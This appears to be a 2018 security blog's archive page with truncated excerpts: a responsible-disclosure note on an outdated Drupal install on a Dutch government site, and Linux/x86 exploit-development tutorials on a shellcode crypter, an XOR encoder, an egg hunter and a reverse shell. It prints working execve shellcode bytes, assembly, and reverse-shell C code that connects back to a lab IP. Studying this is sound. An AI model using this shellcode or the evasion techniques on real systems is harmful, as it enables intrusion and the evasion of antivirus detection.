Month: July 2018

Hacking the Dutch Government – Responsible Disclosure

Security, Vulnerabilities
... and all I got was a lousy t-shirt. The Dutch Government "Rijksoverheid" has a responsible disclosure program where, if you manage to find a vulnerability in one of their systems, they reward you with a shirt carrying a small logo of their National Cyber Security Centre (NCSC) together with "I hacked the Dutch Government and all I got was this lousy t-shirt". Quite humorous, eh? So, visiting one of their websites, I've managed to find a CHANGELOG.txt, a file commonly left behind when an administrator installs software and doesn't clean up. This CHANGELOG.txt basically shows critical information. Seeing that the current Drupal version installed is 7.43 (which is already outdated), one might think that this should be vulnerable to CVE-2018-7600 or "Drupalgeddon", a vulnerability that ...
Shellcode Crypter – Linux/x86

Security
A "crypter" is quite interesting because it scrambles a shellcode with an encryption algorithm so that it can evade signature matching. This is why "crypters" are quite advantageous in penetration testing engagements, but for this article I'll show how a basic "crypter" can work. The first requirement is a shellcode to encrypt. In this case I'll be using an execve shellcode which executes /bin/sh. \x31\xc0\x50\x50\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x64\x24\x0c\x89\xe3\x8d\x4c\x24\x0c\x8b\x54\x24\x10\xb0\x0b\xcd\x80 This shellcode is based on the NASM program: global _start global _start section .text _start: xor eax, eax push eax push eax push eax push "//sh" push "/bin" mov dword[esp + 12], esp mov ebx, esp lea ecx, [esp ...
Custom Shellcode Encoder – X+1 XOR 0xAA (Linux/x86)

Security
Encoders are quite useful in cases where there are restricted characters in an application being exploited. Popular encoders can be found in Metasploit, like shikata_ga_nai and many more. To demonstrate how encoders work, I've created a very basic encoder which adds 1 to each shellcode byte, and the result gets XOR'd with 0xAA. The formula goes something like this: (X + 1) xor 0xAA = Y, where X is a byte of the shellcode and Y is the encoded byte. Y in this case can be transformed back to X using the formula: (Y xor 0xAA) - 1 = X, where Y is the encoded byte and X is the original shellcode byte. To do this, suppose we have an execve NASM program that runs /bin/sh: global _start global _start section .text _start: xor eax, eax push eax push eax push eax push ...
Egg Hunter – Shellcode (Linux/x86)

Security
An egg hunter is usually used in exploit development. To give a brief description, this "process" is used when there is only a small space available to store the shellcode during exploitation. What the egg hunter does is search the whole virtual address space (memory) for the "egg", since it marks the start of another shellcode which couldn't fit in the buffer of the application being exploited. During my time on "Penetration Testing with Kali (PWK-OSCP)", I remember coming across this exploit which had the string "n00bn00b" before the shellcode. It looked something like this: At first, I didn't really mind it because I thought it was just an adjustment for the correct offset of the EIP overwrite, but what I previously couldn't understand is why I should wait ...
Reverse Shell – Shellcode (Linux/x86)

Security
A reverse shell is basically the opposite of a bind shell. Instead of having the remote machine listen for incoming connections, the penetration tester's machine is the one that's listening. There are pros and cons of using a reverse shell vs a bind shell, but this solely depends on how the network between the connecting parties is set up. First, to be able to create a working "reverse shell", a C program has been created to test the functionality of the APIs used. #include <unistd.h> #include <arpa/inet.h> int main() { struct sockaddr_in addr; addr.sin_family = AF_INET; addr.sin_port = htons(443); addr.sin_addr.s_addr = inet_addr("192.168.189.132"); int sockfd = socket(AF_INET, SOCK_STREAM, 0); connect(sockfd, (struct sockaddr*)&addr, sizeof(addr)); dup2(sockfd, ...